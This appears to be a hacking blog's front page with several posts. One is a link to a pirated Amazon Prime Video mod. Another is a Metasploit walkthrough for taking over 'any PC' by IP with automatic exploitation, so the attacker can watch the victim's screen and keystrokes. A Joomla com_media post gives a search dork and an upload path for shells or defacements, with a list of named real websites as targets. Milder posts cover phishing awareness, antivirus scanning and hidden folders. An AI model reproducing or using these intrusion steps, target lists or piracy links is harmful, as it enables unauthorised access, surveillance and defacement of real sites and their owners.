; Cyber Rock Hacker's Zone

Amazon Prime Moded 100% Working



🌀 AMAZON Prime Video Mod 
🔰 Version (3.0.312.34) Final

💠 Ⓜ️od Features :-
🔶 AutoLogin / No login Needed 
🔶 Fully Ads Free
🔶 All Movies & Tv Shows 
🔶 Prime Membership Unlocked 
🔶 4K Watch Quality Unlocked

🌟 Download Link 
https://indianshortner.in/bG0H

🎯𝗦𝗵𝗮𝗿𝗲 & 𝗦𝘂𝗽𝗽𝗼𝗿𝘁💙
Monday, 31 October 2022
Posted by Rock Alber

Hack any PC using IP via Metasploit

Hack any PC using IP via Metasploit

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgreSQL for your database.
Download here:http://www.ihelpgadget.com/
Make sure you use all the defaults or Metasploit won't work!

3.) Now lets get down to business... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't worry, this is normal.

6.)Type db_host to make sure you are connected correctly.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

8.) Now we get to the fun part; the automatic exploitation.
Just type db_autopwn -t -p -e -s -b ,
watch the auto-exploitation start, go play Halo for a while, and then come back...

9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, control their mouse, see what they type, see them, etc.

Tuesday, 17 September 2013
Posted by Rock Alber

How to fast scan full computer

Scan Full Computer Fast With Avast

Asalam-0-Alikum,

1) First go to  http://www.avast.com And Download The Trial Version its free.

2) After install Click on Avast icon and go to Security Tab.



3) Go To Antivirus then  Scroll down.
















4) Then See The Last Option it is Boot Scan  Go There and click on Schedule Now And Restart Your Computer.

Wednesday, 24 July 2013
Posted by Rock Alber

How to make a invisible folder

How To Make invisible Folder

Today I'm going to teach you how to make a invisible folder. 

This can be used for several things.

Today I'm going to teach you how.

1. Right click the "Folder"


Properties -> Customize -> Change Icon 


Now Click "Apply"

Now you see a invisible folder with a name

Now to get a invisible name press these

Hold alt then PRESS 0160 

Then click the Enter key.

Congrats, now you should have a invisible folder


Monday, 22 July 2013
Posted by Rock Alber

Admin finder

Not seen this on here so thought i'd share it. This is not my program.
Its simply to use so anyone can use it and is pretty successful in finding those admin pages


Saturday, 20 July 2013
Posted by Rock Alber

Hack Twitter Using Phishing Method

Hack Twitter Using Phishing Method


There's a scam spreading through Twitter Direct messages (DIVIs) and fake emails. appealing users to visit a fake twitter phishing site i.e "twittler.com". Scam uses a hijacked Twitter account to send out direct messages that appear completely legitimate Security blogger. Janne Ahlberg blogged about this new phishing scam. "This is a nasty trick especially when the sender is someone you know and trust If you receive a suspicious DM or email from a person you know and trust, just warn him/her — the account is most likely hijacked and controlled by the attackers." 

The webpage resembles a Twitter login page and is trying to obtain your Twitter login credentials with a domain name looks very similar to original Twitter.com. with two extra word "LL" in it 
To play it safe, double-check your browser address bar to make sure that's where you are on orginal website twitter.com before logging in. 

If you enter your Twitter username and password into this site. you will become a victim of and the hacker will then control your Twitter account to hack more users via spamming them on your behalf. 

What do you do if your account is hacked? Change your password immediately. Check what applications you've given access to your account. Revoke access for any suspicious applications, and delete tweets and DIVIs you sent and received while your account was compromised 

Monday, 15 July 2013
Posted by Rock Alber

Joomla component (com_media) Vulnerability


Joomla component (com_media) Vulnerability [#] Exploit Title: Com_Media (CMS JOOMLA)
[#] Date: 12-06-2013
[#] Author: Sultan Haikal
[#] Version: 2.5
[# ]Tested on: Windows Xp & Linux 


[#] Dork :-   "inurl:com_media"


[#] TarGet With Example :- 

Target :- www.ayrshirebridge.co.uk 

Just Add This After The Url :- /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

URL :- http://www.ayrshirebridge.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Click Browse at bottom upload your shell in png or jpej format using tamper data. OR

You can also Simply Upload Your Deface In Txt Format.

FInal :- Deface Goes Here 
site.com/images/yourfilename.txt

Eg : http://ayrshirebridge.co.uk/images/x.txt

Thats All :D


[#] Vulnerable Website :


Com_Media Vulnerable Websites :-
www.ayrshirebridge.co.uk
www.magicrete.in 
www.unitedwaypeel.org
www.cvbhejo.com
rockbandschoolofmusic.com
www.adriennejfurness.com
www.one-world-volunteer.net
hiddenneedle.com
www.wartakutim.com
permaculture.com.au/campus
arsomsilp.ac.th/health
www.skylinepark.org
www.gorillareisen.de
www.moclinejo.de
www.sv-mistelgau.de

www.ablogic.de
Posted by Rock Alber

Like Our Page

Popular Post

This Blog For Learn About Hacking And Security. Powered by Blogger.

- Copyright © 2013 Cyber Rock Hacker's Zone Powered by Cyber Rock Hacker Team - Designed by Rock Alber -